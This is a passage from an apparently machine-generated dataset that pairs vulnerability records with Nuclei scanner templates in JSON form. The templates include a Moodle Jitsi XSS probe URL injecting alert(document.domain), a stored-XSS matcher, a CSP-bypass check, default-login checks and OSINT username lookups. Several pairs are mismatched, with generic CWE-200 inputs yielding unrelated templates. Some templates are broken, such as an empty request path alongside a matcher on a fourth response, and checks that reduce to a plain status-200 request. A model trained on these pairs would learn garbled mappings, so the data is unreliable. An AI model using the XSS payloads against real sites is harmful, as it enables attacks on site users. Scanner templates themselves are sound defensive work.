]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-wildfly-default-login",
"timestamp": "2025-11-13T15:15:47.999816Z"
}
}
|
wp-cli-exposure
|
[CANONICAL_RECORD]
{
"cve_id": "wp-cli-exposure",
"summary": "WP-CLI Yaml File Exposure. This template detects WP-CLI Yaml File Exposure by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"{{BaseURL}}/wp-cli.yml"
],
"indicators": [
"apache_modules:",
"mod_rewrite"
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "alibaba-cloud-code-env",
"severity": "info",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "wp-cli-exposure",
"info": {
"name": "WP-CLI Yaml File Exposure",
"author": "DhiyaneshDk",
"severity": "info",
"description": "WP-CLI Yaml File Exposure",
"tags": [
"config",
"exposure",
"wp-cli",
"files",
"vuln"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/wp-cli.yml"
],
"matchers": [
{
"type": "word",
"words": [
"apache_modules:",
"mod_rewrite"
],
"condition": "and"
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-wp-cli-exposure",
"timestamp": "2025-11-13T15:15:49.998619Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "detect-dangling-cname",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "netris-dashboard-panel",
"info": {
"name": "Netris Dashboard Panel - Detect",
"author": "theamanrawat",
"severity": "info",
"description": "Netris Dashboard panel was detected.",
"tags": [
"panel",
"netris",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"Netris Dashboard"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-netris-dashboard-panel",
"timestamp": "2025-11-13T15:15:48.891685Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "detect-dangling-cname",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "dmarc-detect",
"severity": "info",
"tags": [
"dns",
"dmarc",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "mastodononline",
"info": {
"name": "Mastodon.online User Name Information - Detect",
"author": "dwisiswant0",
"severity": "info",
"description": "Mastodon.online user name information check was conducted.",
"tags": [
"osint",
"osint-social",
"mastodononline",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"https://mastodon.online/@{{user}}"
],
"matchers": [
{
"type": "status",
"status": [
200
]
},
{
"type": "word",
"part": "body",
"words": [
"@mastodon.online) - Mastodon</title>"
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-mastodononline",
"timestamp": "2025-11-13T15:15:51.954232Z"
}
}
|
windows-administrator-blank-password
|
[CANONICAL_RECORD]
{
"cve_id": "windows-administrator-blank-password",
"summary": "Checks if the built-in Administrator account has a blank password.",
"affected_products": [],
"paths": [],
"indicators": [
"Built-in Administrator Account Has Blank Password",
"detected"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "windows-administrator-blank-password",
"info": {
"name": "Built-in Administrator Account Has Blank Password",
"author": "princechaddha",
"severity": "high",
"description": "Checks if the built-in Administrator account has a blank password.",
"tags": [
"windows",
"administrator",
"password",
"code",
"windows-audit"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-windows-administrator-blank-password",
"timestamp": "2025-11-13T15:15:39.117870Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "detect-dangling-cname",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "dmarc-detect",
"severity": "info",
"tags": [
"dns",
"dmarc",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "gravatar",
"info": {
"name": "Gravatar User Name Information - Detect",
"author": "dwisiswant0",
"severity": "info",
"description": "Gravatar user name information check was conducted.",
"tags": [
"osint",
"osint-images",
"gravatar",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"http://en.gravatar.com/profiles/{{user}}.json"
],
"matchers": [
{
"type": "status",
"status": [
200
]
},
{
"type": "word",
"part": "body",
"words": [
"entry"
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-gravatar",
"timestamp": "2025-11-13T15:15:51.825273Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "fbi-seized-nameserver",
"severity": "info",
"tags": [
"dns",
"ns",
"darkweb",
"fbi",
"seized",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "detect-dangling-cname",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "ibm-d2b-database-server",
"info": {
"name": "IBM DB2 Database Server - Detect",
"author": "pussycat0x",
"severity": "info",
"description": "IBM DB2 Database Server panel was detected.\n",
"tags": [
"network",
"ibm",
"database",
"db",
"db2",
"detect",
"detection",
"tcp",
"discovery"
],
"reference": [
"https://nmap.org/nsedoc/scripts/db2-das-info.html"
]
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-ibm-d2b-database-server",
"timestamp": "2025-11-13T15:16:08.351655Z"
}
}
|
azure-storage-encryption-missing
|
[CANONICAL_RECORD]
{
"cve_id": "azure-storage-encryption-missing",
"summary": "Ensure that Infrastructure Encryption feature is enabled for your Azure Storage accounts in order to use encryption at the hardware level on top of the default software encryption provided by Microsoft Azure cloud.\n",
"affected_products": [],
"paths": [],
"indicators": [
"Azure Storage Infrastructure Encryption Not Enabled",
"detected"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "azure-storage-encryption-missing",
"info": {
"name": "Azure Storage Infrastructure Encryption Not Enabled",
"author": "princechaddha",
"severity": "high",
"description": "Ensure that Infrastructure Encryption feature is enabled for your Azure Storage accounts in order to use encryption at the hardware level on top of the default software encryption provided by Microsoft Azure cloud.\n",
"tags": [
"cloud",
"devops",
"azure",
"microsoft",
"azure-storage",
"azure-cloud-config"
],
"reference": [
"https://docs.microsoft.com/en-us/azure/storage/common/storage-service-encryption"
]
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-azure-storage-encryption-missing",
"timestamp": "2025-11-13T15:15:38.225382Z"
}
}
|
lpsnmedia-accdn-csp-bypass
|
[CANONICAL_RECORD]
{
"cve_id": "lpsnmedia-accdn-csp-bypass",
"summary": "Content-Security-Policy Bypass - LPSN Media. This template detects Content-Security-Policy Bypass - LPSN Media by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"{{BaseURL}}"
],
"indicators": [
"Content-Security-Policy",
"lpsnmedia.net"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "ack-cluster-cloud-monitor-disable",
"severity": "medium",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-health-disable",
"severity": "medium",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-network-policies-disable",
"severity": "medium",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "lpsnmedia-accdn-csp-bypass",
"info": {
"name": "Content-Security-Policy Bypass - LPSN Media",
"author": "renniepak,DhiyaneshDK",
"severity": "medium",
"description": "Content-Security-Policy Bypass - LPSN Media",
"tags": [
"xss",
"csp-bypass",
"lpsnmedia-accdn",
"vuln"
],
"reference": [
"https://github.com/renniepak/CSPBypass/blob/main/data.tsv"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}"
],
"matchers": [
{
"type": "word",
"part": "header",
"words": [
"Content-Security-Policy",
"lpsnmedia.net"
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-lpsnmedia-accdn-csp-bypass",
"timestamp": "2025-11-13T15:15:39.389982Z"
}
}
|
redis-default-logins
|
[CANONICAL_RECORD]
{
"cve_id": "redis-default-logins",
"summary": "Redis service was accessed with easily guessed credentials.\n",
"affected_products": [],
"paths": [],
"indicators": [
"Redis - Default Logins",
"detected"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "redis-default-logins",
"info": {
"name": "Redis - Default Logins",
"author": "tarunKoyalwar",
"severity": "high",
"description": "Redis service was accessed with easily guessed credentials.\n",
"tags": [
"js",
"redis",
"default-login",
"network",
"vuln"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-redis-default-logins",
"timestamp": "2025-11-13T15:16:08.036984Z"
}
}
|
CVE-2021-26812
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2021-26812",
"summary": "Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the \"sessionpriv.php\" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject javascript code to be run by the application.",
"affected_products": [
{
"vendor": "jitsi",
"product": "meet",
"version_range": ">= 2.7, <= 2.8.3"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2019-14287",
"severity": "high",
"tags": [
"packetstorm",
"cve",
"cve2019",
"sudo",
"code",
"linux",
"privesc",
"local",
"canonical",
"sudo_project",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2021-3156",
"severity": "high",
"tags": [
"packetstorm",
"cve",
"cve2021",
"sudo",
"code",
"linux",
"privesc",
"local",
"kev",
"sudo_project",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2025-1974-k8s",
"severity": "critical",
"tags": [
"cve",
"cve2025",
"cloud",
"devops",
"kubernetes",
"ingress",
"nginx",
"k8s",
"k8s-cluster-security"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://github.com/udima-university/moodle-mod_jitsi/issues/67",
"snippet": "PoC available at https://github.com/udima-university/moodle-mod_jitsi/issues/67"
},
{
"source": "nvd",
"url": "https://github.com/udima-university/moodle-mod_jitsi/issues/67",
"snippet": "PoC available at https://github.com/udima-university/moodle-mod_jitsi/issues/67"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2021-26812",
"info": {
"name": "Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting",
"author": "aceseven (digisec360)",
"severity": "medium",
"description": "Moodle Jitsi Meet 2.7 through 2.8.3 plugin contains a cross-site scripting vulnerability via the \"sessionpriv.php\" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject JavaScript code to be run by the application.",
"tags": [
"cve2021",
"cve",
"moodle",
"jitsi",
"xss",
"plugin",
"vuln"
],
"reference": [
"https://github.com/udima-university/moodle-mod_jitsi/issues/67",
"https://nvd.nist.gov/vuln/detail/CVE-2021-26812",
"https://github.com/ARPSyndicate/kenzer-templates",
"https://github.com/ARPSyndicate/cvemon"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"alert(document.domain);"
]
},
{
"type": "word",
"part": "header",
"words": [
"MoodleSession"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2021-26812",
"timestamp": "2025-11-13T15:15:43.086110Z"
}
}
|
CVE-2021-33851
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2021-33851",
"summary": "A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the \"Custom logo link\" executes whenever the user opens the Settings Page of the \"Customize Login Image\" Plugin.",
"affected_products": [
{
"vendor": "apasionados",
"product": "customize_login_image",
"version_range": "*"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2019-14287",
"severity": "high",
"tags": [
"packetstorm",
"cve",
"cve2019",
"sudo",
"code",
"linux",
"privesc",
"local",
"canonical",
"sudo_project",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html",
"snippet": "PoC available at https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html"
},
{
"source": "nvd",
"url": "https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html",
"snippet": "PoC available at https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2021-33851",
"info": {
"name": "WordPress Customize Login Image <3.5.3 - Cross-Site Scripting",
"author": "8authur",
"severity": "medium",
"description": "WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n",
"tags": [
"cve",
"cve2021",
"wpscan",
"wordpress",
"customize-login-image",
"wp",
"authenticated",
"wp-plugin",
"xss",
"apasionados",
"vuln"
],
"reference": [
"https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203",
"https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html",
"https://wordpress.org/plugins/customize-login-image/",
"https://nvd.nist.gov/vuln/detail/cve-2021-33851",
"https://github.com/ARPSyndicate/kenzer-templates"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "dsl",
"dsl": [
"status_code_4 == 200",
"contains(header_4, \"text/html\")",
"contains(body_4, \"Go to <script>alert(document.domain)</script>\")"
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2021-33851",
"timestamp": "2025-11-13T15:15:43.291386Z"
}
}
|
CVE-2024-5217
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2024-5217",
"summary": "ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform.\u00a0The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.",
"affected_products": [
{
"vendor": "servicenow",
"product": "servicenow",
"version_range": "*"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "critical"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2020-0646",
"severity": "critical",
"tags": [
"cve",
"cve2020",
"net-framework",
"sharepoint",
"microsoft",
"packetstorm",
"rce",
"kev",
"oast",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2024-5217",
"info": {
